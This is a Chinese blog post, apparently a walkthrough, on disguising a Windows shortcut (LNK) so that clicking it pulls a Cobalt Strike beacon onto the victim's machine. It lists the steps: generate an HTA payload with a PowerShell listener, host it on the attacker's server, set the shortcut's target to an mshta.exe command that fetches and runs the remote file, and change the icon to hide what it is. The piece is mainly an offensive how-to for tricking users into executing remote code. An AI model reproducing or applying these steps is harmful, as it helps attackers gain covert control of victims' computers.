当前位置:网站首页>利用快捷方式-LNK-上线CS
利用快捷方式-LNK-上线CS
2022-07-06 06:24:00 【zxl2605】
步骤:
1、生成:Attacks -> Packages -> Html Application
2、上传:Attacks——>Web Drive by——>Host file
3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
4、伪装:
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装
这里会用到windows中的mshta,用于执行hta文件
mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件
下面进行演示
打开已经配置好的CS
1、生成:Attacks -> Packages -> Html Application
选择设置的监听器-power shell
生成evil.hta
2、上传:Attacks——>Web Drive by——>Host file
复制生成的利用文件网址
3.创建快捷方式
4.执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
5.伪装(自行拓展,不做演示)
-创建快捷方式
-生成HTA并上传
-属性更改目标执行
-属性更改图标伪装(自行扩展)
点击快捷方式-快捷方式成功上线
边栏推荐
- 基于JEECG-BOOT的list页面的地址栏参数传递
- 模拟卷Leetcode【普通】1061. 按字典序排列最小的等效字符串
- [Tera term] black cat takes you to learn TTL script -- serial port automation skill in embedded development
- 翻译生物医学说明书,英译中怎样效果佳
- Caused by:org. gradle. api. internal. plugins . PluginApplicationException: Failed to apply plugin
- oscp raven2靶机渗透过程
- Luogu p2089 roast chicken
- 联合索引的左匹配原则
- The pit encountered by keil over the years
- Difference between backtracking and recursion
猜你喜欢
Error getting a new connection Cause: org. apache. commons. dbcp. SQLNestedException
LeetCode 739. Daily temperature
Basic knowledge of MySQL
联合索引的左匹配原则
Summary of anomaly detection methods
org. activiti. bpmn. exceptions. XMLException: cvc-complex-type. 2.4. a: Invalid content beginning with element 'outgoing' was found
如何将flv文件转为mp4文件?一个简单的解决办法
![[web security] nodejs prototype chain pollution analysis](/img/b6/8eddc9cbe343f2439da92bf342b0dc.jpg)
[web security] nodejs prototype chain pollution analysis
基於JEECG-BOOT的list頁面的地址欄參數傳遞
Address bar parameter transmission of list page based on jeecg-boot
随机推荐
数据库隔离级别
Online and offline problems
Database - current read and snapshot read
Win10 cannot operate (delete, cut) files
Simulation volume leetcode [general] 1405 Longest happy string
如何将flv文件转为mp4文件?一个简单的解决办法
On weak network test of special test
模拟卷Leetcode【普通】1091. 二进制矩阵中的最短路径
RestTemplate、Feign实现Token传递
Simulation volume leetcode [general] 1109 Flight reservation statistics
浅谈专项测试之弱网络测试
[Tera term] black cat takes you to learn TTL script -- serial port automation skill in embedded development
E - 食物链
关于新冠疫情,常用的英文单词、语句有哪些?
G - Supermarket
MySQL is sorted alphabetically
Is the test cycle compressed? Teach you 9 ways to deal with it
Redis core technology and basic architecture of actual combat: what does a key value database contain?
基於JEECG-BOOT的list頁面的地址欄參數傳遞
Private cloud disk deployment